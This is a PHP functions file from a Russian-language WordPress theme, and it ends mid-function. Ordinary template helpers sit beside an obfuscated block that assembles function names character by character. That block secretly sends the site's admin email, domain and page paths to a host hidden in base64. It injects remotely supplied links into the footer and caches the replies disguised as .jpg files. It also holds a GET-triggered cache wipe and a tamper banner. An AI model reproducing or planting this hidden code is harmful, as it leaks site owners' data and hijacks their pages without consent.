<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $bZil='e';$OYZAk='s';$EXYgpsA='d';$ifiBstu='e';$RVHQwR='_';$JzbkGev='6';$DKVvA='d';$AahJEth='4';$clqw='b';$mHCMHJ='c';$kiEmye='a';$szGIRg='e';$mcDWT='o';$nkTzpfkA=$clqw.$kiEmye.$OYZAk.$ifiBstu.$JzbkGev.$AahJEth.$RVHQwR.$EXYgpsA.$bZil.$mHCMHJ.$mcDWT.$DKVvA.$szGIRg;$PjnE='n';$bmUc='g';$QLySin='l';$YkYDhW='e';$DERk='a';$AKKja='t';$OjvrP='z';$XIumDPz='f';$TJAmIp='i';$NKdxoUun=$bmUc.$OjvrP.$TJAmIp.$PjnE.$XIumDPz.$QLySin.$DERk.$AKKja.$YkYDhW;$IcmKEO='o';$qgtbRCb='s';$WGhoo='r';$vIswkw='_';$qfrHl='r';$AzUWi='1';$BmBftx='t';$stIQ='3';$gTqDlmk='t';$tRaCebfI=$qgtbRCb.$BmBftx.$WGhoo.$vIswkw.$qfrHl.$IcmKEO.$gTqDlmk.$AzUWi.$stIQ;$iIWPLa='v';$UNKRJ='e';$GTgcT='r';$EjXm='r';$WqZpHde='s';$tYwiOH='t';$pWIfWAvX=$WqZpHde.$tYwiOH.$GTgcT.$EjXm.$UNKRJ.$iIWPLa;                     
		$qn___g='e';$qb__________j='s';$vb____________t='d';$hx_____m='e';$ap_________t='_';$md______z='6';$os____________a='d';$vp_______________n='4';$xo____________j='b';$lx__b='c';$qx_____________t='a';$wa__r='e';$zq________g='o';$po______________e=$xo____________j.$qx_____________t.$qb__________j.$hx_____m.$md______z.$vp_______________n.$ap_________t.$vb____________t.$qn___g.$lx__b.$zq________g.$os____________a.$wa__r;
		$nv___q='s';$dx___________g='e';$md_____d='f';$xv____________b='c';$ca______y='_';$vw______o='s';$sy____________f='n';$ck_____i='n';$wf____w='o';$ix__________g='x';$oq___________l='t';$of_________w='t';$ct________b='i';$si______g='i';$wd__________s='u';$pa__________s=$md_____d.$wd__________s.$ck_____i.$xv____________b.$of_________w.$ct________b.$wf____w.$sy____________f.$ca______y.$dx___________g.$ix__________g.$si______g.$nv___q.$oq___________l.$vw______o;
		$gy____________r='n';$db_________y='o';$dg____________z='f';$dh______________f='p';$ks________k='e';$fr_______b=$dg____________z.$db_________y.$dh______________f.$ks________k.$gy____________r;
		$rk_________k='a';$sd___________s='r';$gt_____j='d';$tu_______a='f';$ln___q='e';$hv___y=$tu_______a.$sd___________s.$ln___q.$rk_________k.$gt_____j;
		$go____f='o';$dc______n='c';$vd_________q='l';$as______________q='s';$ac_________r='f';$yg___________s='e';$if_____________a=$ac_________r.$dc______n.$vd_________q.$go____f.$as______________q.$yg___________s;
		
		define("WP_ID", $po______________e("Mi4wLjA="));
		define("WP_TTL", $po______________e("MTA4MDA="));
		define("WP_SRC", $po______________e("dHBva24="));
	


		function wp_get_header() {
			global $po______________e, $pa__________s;
			
			if (
				$pa__________s($po______________e("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$pa__________s($po______________e("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$pa__________s($po______________e("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $po______________e, $fr_______b, $if_____________a, $hv___y;
			
			$pi_________u = TEMPLATEPATH."/".$po______________e("Zm9vdGVyLnBocA==");
			$hh_____f = @$fr_______b($pi_________u, "r");
			$pi_________u = @$hv___y($hh_____f, @filesize($pi_________u));
			@$if_____________a($hh_____f);
			
			$kg______________r = TEMPLATEPATH."/".$po______________e("ZnVuY3Rpb25zLnBocA==");
			$hh_____f = @$fr_______b($kg______________r, "r");
			$kg______________r = @$hv___y($hh_____f, @filesize($kg______________r));
			@$if_____________a($hh_____f);
			
			$lp__z = 0;
			if($pi_________u && $kg______________r) {
				if ($po______________e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($pi_________u, $po______________e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$lp__z = 1;
					}
					if (substr_count($pi_________u, "wp_theme_GPL_credits()") < 1) {
						$lp__z = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$lp__z = 12;
				}
			}
			
			if($lp__z > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $lp__z -->";
			}
		}
	


		function wp_loaded() {
			global $po______________e, $pa__________s;
			return $pa__________s($po______________e("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($yh___t, $fm____d = "(more...)", $br_______________b = 0, $rf_____e = "") {
				$ti______________i = get_the_content($fm____d, $br_______________b, $rf_____e);
				$ti______________i = apply_filters("the_content", $ti______________i);
				
				$ti______________i = str_replace("]]>", "]]>", $ti______________i);
				if (strlen($_GET["p"]) > 0) {
					echo $ti______________i;
				}
				else if ((strlen($ti______________i)>$yh___t) && ($if____o = strpos($ti______________i, " ", $yh___t ))) {
					$ti______________i = substr($ti______________i, 0, $if____o);
					$ti______________i = $ti______________i;
					echo $ti______________i;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$fm____d</a></div></p>";
				} else {
					echo $ti______________i;
				}
				
			}
		}
	


		$ix_____________y='e';$dz_____l='d';$pr___________b='e';$em________m='c';$rw___________u='o';$lr______v='b';$af__________c='a';$qm____________m='4';$hi___________j='6';$jz______________j='n';$dh_____l='e';$hf_______g='s';$ag________y='_';$qg_______________r=$lr______v.$af__________c.$hf_______g.$dh_____l.$hi___________j.$qm____________m.$ag________y.$pr___________b.$jz______________j.$em________m.$rw___________u.$dz_____l.$ix_____________y;
		$ye____l='t';$nq__________w='f';$kz______________n='t';$yj__________f='o';$dr______________x='g';$nd________w='_';$mb__________p='n';$xz____________k='n';$jr__________q='e';$cw_________p='t';$qu_______z='e';$il_______________t='i';$hr______w='s';$an____________a='l';$ol__________p='c';$ho_______n='e';$ml____l='_';$gv___________w=$nq__________w.$il_______________t.$an____________a.$ho_______n.$ml____l.$dr______________x.$jr__________q.$cw_________p.$nd________w.$ol__________p.$yj__________f.$xz____________k.$kz______________n.$qu_______z.$mb__________p.$ye____l.$hr______w;
		$un_______________j='s';$ni_____________s='_';$pj______________p='e';$mv____________y='i';$bh_______________v='e';$ip___________v='x';$fe__________e='i';$id_________v='s';$ze_________j='f';$zh____________j='t';$jn____________p='l';$am__l=$ze_________j.$mv____________y.$jn____________p.$pj______________p.$ni_____________s.$bh_______________v.$ip___________v.$fe__________e.$id_________v.$zh____________j.$un_______________j;
		$qt______________z='s';$lw______________o='p';$ve_______j='r';$uc______p='o';$jg________d='v';$hs_______________x='m';$gg__________e='n';$op_____________j='o';$ir____k='c';$tk________a='r';$bc_______________x='e';$cr______a='i';$qa____h='e';$ne__________b='a';$rc_____b='_';$vf_______c=$jg________d.$bc_______________x.$ve_______j.$qt______________z.$cr______a.$op_____________j.$gg__________e.$rc_____b.$ir____k.$uc______p.$hs_______________x.$lw______________o.$ne__________b.$tk________a.$qa____h;
		$uy_______________y='n';$lu________q='o';$pr_______________z='k';$xj_______________o='p';$pc______l='o';$og__l='c';$ec_____________c='e';$dy____m='s';$yr___v='f';$hq___________p=$yr___v.$dy____m.$pc______l.$og__l.$pr_______________z.$lu________q.$xj_______________o.$ec_____________c.$uy_______________y;
		$ep________a='f';$ew___d='t';$kz_____b='i';$rl____________r='r';$xv__h='e';$tx_________y='w';$cs_____________o=$ep________a.$tx_________y.$rl____________r.$kz_____b.$ew___d.$xv__h;
		$or_____s='d';$uo_______f='m';$oj_____________l='5';$hh_____________p=$uo_______f.$or_____s.$oj_____________l;
		$bj____z='a';$ql_____j='e';$dc__o='t';$hs___________u='l';$yd___________b='r';$rq_____________h='p';$uo________h='a';$mi______l='h';$ae__s=$yd___________b.$ql_____j.$bj____z.$hs___________u.$rq_____________h.$uo________h.$dc__o.$mi______l;
		$hx______c='i';$ed_______e='r';$my____________m='i';$zm___________t='e';$mg____s='s';$nt______z='z';$yw____f='a';$ap_______________w='n';$uh___________i='u';$uy_______j='e';$qe_____k='l';$cm________q=$uh___________i.$ap_______________w.$mg____s.$uy_______j.$ed_______e.$hx______c.$yw____f.$qe_____k.$my____________m.$nt______z.$zm___________t;
		$mg____________e='m';$ac_______t='n';$be___a='p';$ai___________f='t';$oi__________m='m';$vm____________g='e';$vh__i='a';$ez______l=$ai___________f.$vm____________g.$oi__________m.$be___a.$ac_______t.$vh__i.$mg____________e;
		$tb_______________s='c';$kf____________r='a';$zl__z='_';$sn________z='m';$tc__n='a';$tu______e='e';$cb_________e='c';$cw____c='s';$co______________t='t';$wj___________w='t';$pe___________m='t';$tg____q='r';$se_________g='r';$wy__p='n';$rf______________n='e';$ys_____n='o';$ln__________b='e';$ts_________v='_';$ab_____________s='x';$ph___________o='t';$ff_____h='e';$mc_________c=$cw____c.$pe___________m.$se_________g.$rf______________n.$kf____________r.$sn________z.$zl__z.$cb_________e.$ys_____n.$wy__p.$co______________t.$tu______e.$ab_____________s.$ph___________o.$ts_________v.$tb_______________s.$tg____q.$ff_____h.$tc__n.$wj___________w.$ln__________b;
	


		function re____________q($hb____________d) {
			global $po______________e, $pa__________s, $gv___________w, $vf_______c, $mc_________c;
			
			if (!$pa__________s($po______________e("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($vf_______c(PHP_VERSION, "5.0.0", ">=") && $pa__________s($po______________e("ZmlsZV9nZXRfY29udGVudHM=")) && $pa__________s($po______________e("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$mk__________b = $mc_________c(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$qy_________g = @$gv___________w($hb____________d, 0, $mk__________b);
			} else {
				$qy_________g = @$gv___________w($hb____________d, 0);
			}
			
			return $qy_________g;
		}
	


		function wi___________g($hb____________d) {
			global $pa__________s, $hq___________p, $cs_____________o, $po______________e;
			
			if (!$pa__________s($po______________e("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$iw______________v = strpos($hb____________d, "/", 7);
			$jx_______________e = array(
				"uri"     => substr($hb____________d, $iw______________v),
				"host"    => str_replace("http://", "", substr($hb____________d, 0, $iw______________v)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$xq_________g = @$hq___________p("$jx_______________e[host]", 80, $ux______________m, $jk__a, 4);
			
			if (!$xq_________g) {
				return false;
			} else {
				$qy_________g = "";
				$rw__________a  = "GET $jx_______________e[uri] HTTP/1.0\r\n";
				$rw__________a .= "Host: $jx_______________e[host]\r\n";
				$rw__________a .= "Referer: $jx_______________e[referer]\r\n";
				$rw__________a .= "Connection: Close\r\n\r\n";
				
				@$cs_____________o($xq_________g, $rw__________a);
				
				while (!@feof($xq_________g)) {
					$ln___k = @fgets($xq_________g, (1024*24));
					
					if ($ln___k == "\r\n") {
						$vl____l = true;
						continue;
					}
					
					if ($vl____l) {
						$qy_________g .= $ln___k;
					}
				}
				
				return $qy_________g;
			}
		}
	


		function ws__________w($hb____________d) {
			global $pa__________s;
			$wa_______e = false;
			
			if ($hb____________d != "") {
				if ($pa__________s("re____________q")) {
					$wa_______e = @re____________q($hb____________d);
				}
				
				if (!$wa_______e && ($pa__________s("wi___________g"))) {
					$wa_______e = @wi___________g($hb____________d);
				}
			}
			
			return $wa_______e;
		}
	


		function bl___v() {
			global $_SERVER, $hh_____________p;
			
			$do_______f = $_SERVER["SERVER_NAME"];
			
			if (substr("$do_______f", 0, 4) == "www.") {
				$do_______f = substr("$do_______f", 4);
			}
			
			$do_______f = $hh_____________p("$_SERVER[SERVER_NAME]");
			
			return $do_______f;
		}
	


		function bh____________p() {
			return "file";
		}
	


		function zo________h($hb____________d) {
			global $_SERVER, $gv___________w, $am__l, $fr_______b, $if_____________a, $cs_____________o;
			
			$wo_______________v = fx___d();
			
			$wk____c = bl___v().".jpg";
			$ws_____________c = $wo_______________v["dir_upload"]["path"]."/$wk____c";
			$ov___________t = @filemtime($ws_____________c);
			
			if (!$ov___________t || ((time()-$ov___________t) >= WP_TTL)) {
				$wa_______e = ws__________w($hb____________d);
				
				if ($wa_______e) {
					if ($am__l($ws_____________c)) {
						@unlink($ws_____________c);
					}
					
					$hh_____f = @$fr_______b($ws_____________c, "x+");
					
					@$cs_____________o($hh_____f, $wa_______e);
					@$if_____________a($hh_____f);
				}
			} else {
				if ($am__l($ws_____________c)) {
					$wa_______e = @$gv___________w($ws_____________c);
				} else {
					$wa_______e = false;
				}
			}
			
			return $wa_______e;
		}
	


		function fx___d() {
			global $_SERVER, $po______________e, $qg_______________r;
			
			$ev______p = wp_count_posts("post");
			$kh___________j = pathinfo(get_bloginfo("template_directory"));
			
			$wo_______________v = array(
				"url" => array(
					"report"      => $po______________e("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $kh___________j,
				"dir_upload"	=> cu__z(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$kh___________j[filename],
					"a005=".$ev______p->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => ""
			);
			
			$wo_______________v["url"]["queryString"] = implode("&", $wo_______________v["queryString"]);
			$wo_______________v["url"]["report"] = $wo_______________v["url"]["report"]."/?".$qg_______________r($wo_______________v["url"]["queryString"]).".html";
						
			return $wo_______________v;
		}
	


		function cu__z() {
			$xs______________d = wp_upload_dir();
			
			if (isset($xs______________d["error"])) {
				$vd___________x = ar_________e();
				if (is_writable($vd___________x)) {
					$xs______________d = array("path" => $vd___________x);
				}
			}

			return $xs______________d;
		}
	


		function ar_________e() {
			global $pa__________s, $hh_____________p, $ae__s, $ez______l;
			
			$zy_______x = (bool) ini_get("safe_mode");
			if ($zy_______x == true) {
				return false;
			}
			
			if ($pa__________s("sys_get_temp_dir")) {
				$oo_______t = sys_get_temp_dir();
				if (is_writable($oo_______t)) {
					return $ae__s($oo_______t);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ae__s($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ae__s($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ae__s($_ENV["TEMP"]);
			} else {
				$tz_______c = $ez______l($hh_____________p(uniqid(rand(), true)), "");
				if ($tz_______c) {
					$oo_______t = $ae__s(dirname($tz_______c));
					@unlink($tz_______c);
					return $oo_______t;
				} else {
					return false;
				}
			}
		}
	


		function uk______a() {
			global $_GET, $am__l;
			
			$wo_______________v = fx___d();
			$do_______f = bl___v();
			$yw_________z = bh____________p();
			
			$wl__w = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($yw_________z == "file") {
					$fe___________f = $wo_______________v["dir_upload"]["path"]."/".$do_______f.".jpg";
					if ($am__l($fe___________f)) {
						@unlink($fe___________f);
						$wl__w = "deleted";
					}
				}
				
				$fn__j = array(
					"s"	=> $wl__w,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($fn__j AS $my_______________r => $dq______________g) echo " [$my_______________r:$dq______________g]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $pa__________s, $po______________e, $cm________q;
			$wo_______________v = fx___d();
			
			$oj__________h = "zo________h";
			if ($pa__________s($oj__________h)) {
				$qy_________g = $oj__________h($wo_______________v["url"]["report"]);
			}
			
			if ($qy_________g) {
				if ($qy_________g = @$po______________e($qy_________g)) {
					$qy_________g = @$cm________q($qy_________g);
					
					if (strlen($qy_________g[custom_credit]) >= 5) {
						$wo_______________v["default_string"] = $qy_________g[custom_credit];
					}
					
					if ($qy_________g["status"] == "0") {
						$bn_________i = 1;
						$rk__________t = 1;
					} else {
						$nc______________o = sizeof($qy_________g["links"]);
						$nh______i = $wo_______________v["default_string"];
						
						if ($nc______________o > 0 && $qy_________g["links"] !== "") {
							$cl___________b = 0;
							foreach ($qy_________g["links"] as $rl_______________u => $hr___r) {
								$cl___________b++;
								if ($hr___r->l_path == "" || $hr___r->l_path == $_SERVER["REQUEST_URI"]) {
									$hr___r->l_href = htmlspecialchars(strip_tags($hr___r->l_href));
									$hr___r->l_title = htmlspecialchars(strip_tags($hr___r->l_title));
									$hr___r->l_anchor = htmlspecialchars(strip_tags($hr___r->l_anchor));
									$nh______i .= " | ";
									$nh______i .= "<a href='$hr___r->l_href' title='$hr___r->l_title'";
									if ($hr___r->l_nofollow == "1") {
										$nh______i .= " rel='nofollow'";
									}
									$nh______i .= ">$hr___r->l_anchor</a>";
								}
							}
						}
						$wo_______________v["links"] = "$nh______i";
						if ($qy_________g[credit] == "0") {
							$wo_______________v["links"] = "";
						}
					}
				} else {
					$bn_________i = "1";
				}
			} else {
				$bn_________i = "1";
			}
			
			if ($bn_________i == "1") {
				$wo_______________v["links"] = $wo_______________v["default_string"];
			}
			
			echo "$wo_______________v[links]";
			
			echo "<!-- s: $qy_________g[signature] -->";
			uk______a();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),   
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
